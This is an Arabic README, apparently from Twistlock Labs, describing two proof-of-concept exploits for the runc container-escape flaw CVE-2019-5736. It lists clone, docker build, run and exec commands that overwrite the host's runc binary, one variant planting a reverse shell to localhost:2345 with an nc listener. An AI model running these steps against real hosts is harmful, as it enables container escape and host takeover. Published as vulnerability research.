
CVE-2019-5736 POCs
مثالان (PoCs) لـ CVE-2019-5736. راجع Twistlock Labs لشرح CVE-2019-5736 والـ PoCs.
إن PoC الصورة الخبيثة مبني بشكل كبير على PoC لـ q3k، لذا فكل الفضل يعود له.
ملاحظة: تشغيل الـ PoCs سيؤدي إلى استبدال ثنائي runc على المضيف. يُنصح بإنشاء نسخة من ثنائي runc الخاص بك (عادةً في /usr/sbin/runc) قبل تشغيل أحد الـ PoCs.
استنساخ المستودع:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
يستبدل runc ببرنامج بسيط يطبع سلسلة نصية.
تشغيل exec PoC:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
يستبدل runc ببرنامج bash نصي لصدفة عكسية بسيطة تتصل بـ localhost:2345.
استمع للصدفة العكسية:
$ nc -nvlp 2345
من نافذة طرفية أخرى، شغّل الـ PoC للصورة الخبيثة:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC